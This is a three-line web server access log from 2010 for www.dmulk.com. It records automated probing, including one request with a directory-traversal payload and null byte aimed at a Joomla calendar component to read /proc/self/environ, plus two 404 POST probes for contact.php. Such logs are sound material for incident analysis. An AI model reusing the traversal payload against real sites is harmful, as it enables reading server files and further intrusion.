75.127.98.12 - - [02/Sep/2010:09:31:08 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68482 "-" "libwww-perl/5.834" "www.dmulk.com"
116.122.36.34 - - [02/Sep/2010:09:31:35 -0700] "POST /logs/access_090505.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
116.122.36.34 - - [02/Sep/2010:09:31:35 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
